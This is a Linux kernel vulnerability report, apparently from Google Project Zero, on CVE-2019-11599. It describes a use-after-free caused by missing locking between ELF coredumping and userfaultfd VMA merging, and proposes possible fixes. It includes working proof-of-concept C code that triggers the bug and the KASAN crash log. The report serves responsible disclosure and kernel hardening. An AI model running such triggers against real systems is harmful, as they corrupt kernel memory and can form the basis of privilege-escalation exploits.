Linux: missing locking between ELF coredump code and userfaultfd VMA modification 

Related CVE Numbers: CVE-2019-11599.


elf_core_dump() has a comment back from something like 2.5.43-C3 that says:

        /*
         * We no longer stop all VM operations.
         * 
         * This is because those proceses that could possibly change map_count
         * or the mmap / vma pages are now blocked in do_exit on current
         * finishing this core dump.
         *
         * Only ptrace can touch these memory addresses, but it doesn't change
         * the map_count or the pages allocated. So no possibility of crashing
         * exists while dumping the mm->vm_next areas to the core file.
         */

However, since commit 86039bd3b4e6 (\"userfaultfd: add new syscall to provide
memory externalization\", introduced in v4.3), that's no longer true; the
following functions can call vma_merge() on another task's VMAs while holding
the corresponding mmap_sem for writing:

 - userfaultfd_release() [->release handler]
 - userfaultfd_register() [invoked via ->unlocked_ioctl handler]
 - userfaultfd_unregister() [invoked via ->unlocked_ioctl handler]

This means that VMAs can disappear from under elf_core_dump().


I see two potential ways to fix this, but I'm not sure whether either of them is
good:

1. Let elf_core_dump() hold a read lock on the mmap_sem across the page-dumping
   loop. This would mean that the mmap_sem can be blocked indefinitely by a
   userspace process, and e.g. userfaultfd_release() could block the task or
   global workqueue it's running on (depending on where the final fput()
   happened) indefinitely, which seems potentially bad from a denial-of-service
   perspective?
2. Let coredump_wait() set a flag on the mm_struct before dropping the mmap_sem
   that says \"this mm_struct is going away, keep your hands off\";
   let the userfaultfd ioctl handlers check for the flag and bail out as if the
   mm_struct was already dead;
   hack userfaultfd_release() so that it only calls vma_merge() if the flag
   hasn't been set;
   and because I feel icky about concurrent reads and writes of bitmasks without
   explicit annotations, either make the vm_flags accesses in
   userfaultfd_release() and in everything called from elf_core_dump() atomic
   (because userfaultfd_release will clear bits in them concurrently with reads
   from elf_core_dump()) or let elf_core_dump() take the mmap_sem for reading
   while looking at vm_flags.
   If the fix goes in this direction, it should probably come with a big warning
   on top of the definition of mmap_sem, or something like that.


Here's a simple proof-of-concept:
======================================================================
user@debian:~/uffd_coredump$ cat coredump_helper.c
#include <unistd.h>
#include <stdlib.h>
#include <err.h>
#include <stdbool.h>

int main(void) {
  char buf[1024];
  size_t total = 0;
  bool slept = false;
  while (1) {
    int res = read(0, buf, sizeof(buf));
    if (res == -1) err(1, \"read\");
    if (res == 0) return 0;
    total += res;
    if (total > 1024*1024 && !slept) {
      sleep(10);
      slept = true;
    }
  }
}
user@debian:~/uffd_coredump$ gcc -o coredump_helper coredump_helper.c
user@debian:~/uffd_coredump$ cat set_helper.sh 
#!/bin/sh
echo \"|$(realpath ./coredump_helper)\" > /proc/sys/kernel/core_pattern
user@debian:~/uffd_coredump$ sudo ./set_helper.sh 
user@debian:~/uffd_coredump$ cat dumpme.c 
#define _GNU_SOURCE
#include <string.h>
#include <stdlib.h>
#include <linux/userfaultfd.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <err.h>
#include <unistd.h>
#include <sys/mman.h>

int main(void) {
  // set up an area consisting of half normal anon memory, half present userfaultfd region
  void *area = mmap(NULL, 1024*1024*2, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
  if (area == MAP_FAILED) err(1, \"mmap\");
  memset(area, 'A', 1024*1024*2);
  int uffd = syscall(__NR_userfaultfd, 0);
  if (uffd == -1) err(1, \"userfaultfd\");
  struct uffdio_api api = { .api = 0xAA, .features = 0 };
  if (ioctl(uffd, UFFDIO_API, &api)) err(1, \"API\");
  struct uffdio_register reg = {
    .range = { .start = (unsigned long)area+1024*1024, .len = 1024*1024 },
    .mode = UFFDIO_REGISTER_MODE_MISSING
  };
  if (ioctl(uffd, UFFDIO_REGISTER, &reg)) err(1, \"REGISTER\");

  // spawn a child that can do stuff with the userfaultfd
  pid_t child = fork();
  if (child == -1) err(1, \"fork\");
  if (child == 0) {
    sleep(3);
    if (ioctl(uffd, UFFDIO_UNREGISTER, &reg.range)) err(1, \"UNREGISTER\");
    exit(0);
  }

  *(volatile char *)0 = 42;
}
user@debian:~/uffd_coredump$ gcc -o dumpme dumpme.c
user@debian:~/uffd_coredump$ ./dumpme 
Segmentation fault (core dumped)
user@debian:~/uffd_coredump$ 
======================================================================

dmesg output:
======================================================================
[  128.977354] dumpme[1116]: segfault at 0 ip 0000563e14789a6e sp 00007ffed407cd80 error 6 in dumpme[563e14789000+1000]
[  128.979600] Code: ff 85 c0 74 16 48 8d 35 d7 00 00 00 bf 01 00 00 00 b8 00 00 00 00 e8 c1 fc ff ff bf 00 00 00 00 e8 c7 fc ff ff b8 00 00 00 00 <c6> 00 2a b8 00 00 00 00 c9 c3 0f 1f 84 00 00 00 00 00 41 57 41 56
[  138.988465] ==================================================================
[  138.992696] BUG: KASAN: use-after-free in elf_core_dump+0x2063/0x20e0
[  138.994168] Read of size 8 at addr ffff8881e616ed60 by task dumpme/1116

[  138.996163] CPU: 1 PID: 1116 Comm: dumpme Not tainted 5.0.0-rc8 #292
[  138.997591] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014
[  138.999570] Call Trace:
[  139.000237]  dump_stack+0x71/0xab
[...]
[  139.001940]  print_address_description+0x6a/0x2b0
[...]
[  139.005026]  kasan_report+0x14e/0x192
[...]
[  139.006803]  elf_core_dump+0x2063/0x20e0
[...]
[  139.013876]  do_coredump+0x1072/0x17a0
[...]
[  139.027534]  get_signal+0x93c/0xa90
[  139.028400]  do_signal+0x85/0xb20
[...]
[  139.034068]  exit_to_usermode_loop+0xfb/0x120
[...]
[  139.036028]  prepare_exit_to_usermode+0x95/0xb0
[  139.037114]  retint_user+0x8/0x8
[  139.037884] RIP: 0033:0x563e14789a6e
[  139.038661] Code: ff 85 c0 74 16 48 8d 35 d7 00 00 00 bf 01 00 00 00 b8 00 00 00 00 e8 c1 fc ff ff bf 00 00 00 00 e8 c7 fc ff ff b8 00 00 00 00 <c6> 00 2a b8 00 00 00 00 c9 c3 0f 1f 84 00 00 00 00 00 41 57 41 56
[  139.042892] RSP: 002b:00007ffed407cd80 EFLAGS: 00010202
[  139.044148] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 00007f654198538b
[  139.045809] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000001200011
[  139.047405] RBP: 00007ffed407cdd0 R08: 00007f6541e6f700 R09: 00007ffed407cdae
[  139.049063] R10: 00007f6541e6f9d0 R11: 0000000000000246 R12: 0000563e14789770
[  139.050659] R13: 00007ffed407ceb0 R14: 0000000000000000 R15: 0000000000000000

[  139.052673] Allocated by task 1116:
[  139.053506]  __kasan_kmalloc.constprop.9+0xa0/0xd0
[  139.054600]  kmem_cache_alloc+0xd6/0x1e0
[  139.055561]  vm_area_alloc+0x1b/0x80
[  139.056339]  mmap_region+0x4db/0xa60
[  139.057179]  do_mmap+0x44d/0x6f0
[  139.057953]  vm_mmap_pgoff+0x163/0x1b0
[  139.058936]  ksys_mmap_pgoff+0x16a/0x330
[  139.059839]  do_syscall_64+0x73/0x160
[  139.060633]  entry_SYSCALL_64_after_hwframe+0x44/0xa9

[  139.062270] Freed by task 1117:
[  139.062957]  __kasan_slab_free+0x130/0x180
[  139.063906]  kmem_cache_free+0x73/0x1c0
[  139.064829]  __vma_adjust+0x564/0xca0
[  139.065756]  vma_merge+0x358/0x6a0
[  139.066504]  userfaultfd_ioctl+0x687/0x17c0
[  139.067533]  do_vfs_ioctl+0x134/0x8f0
[  139.068377]  ksys_ioctl+0x70/0x80
[  139.069141]  __x64_sys_ioctl+0x3d/0x50
[  139.069959]  do_syscall_64+0x73/0x160
[  139.070755]  entry_SYSCALL_64_after_hwframe+0x44/0xa9

[  139.072235] The buggy address belongs to the object at ffff8881e616ed50
                which belongs to the cache vm_area_struct of size 200
[  139.075075] The buggy address is located 16 bytes inside of
                200-byte region [ffff8881e616ed50, ffff8881e616ee18)
[  139.077556] The buggy address belongs to the page:
[  139.078648] page:ffffea0007985b00 count:1 mapcount:0 mapping:ffff8881eada6f00 index:0x0 compound_mapcount: 0
[  139.080745] flags: 0x17fffc000010200(slab|head)
[  139.081724] raw: 017fffc000010200 ffffea000792dc08 ffffea0007765c08 ffff8881eada6f00
[  139.083477] raw: 0000000000000000 00000000001d001d 00000001ffffffff 0000000000000000
[  139.085121] page dumped because: kasan: bad access detected

[  139.086667] Memory state around the buggy address:
[  139.087695]  ffff8881e616ec00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[  139.089294]  ffff8881e616ec80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[  139.090833] >ffff8881e616ed00: fc fc fc fc fc fc fc fc fc fc fb fb fb fb fb fb
[  139.092417]                                                        ^
[  139.093780]  ffff8881e616ed80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[  139.095318]  ffff8881e616ee00: fb fb fb fc fc fc fc fc fc fc fc fc fc fc fc fc
[  139.096917] ==================================================================
[  139.098460] Disabling lock debugging due to kernel taint
======================================================================


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.


Found by: jannh@google.com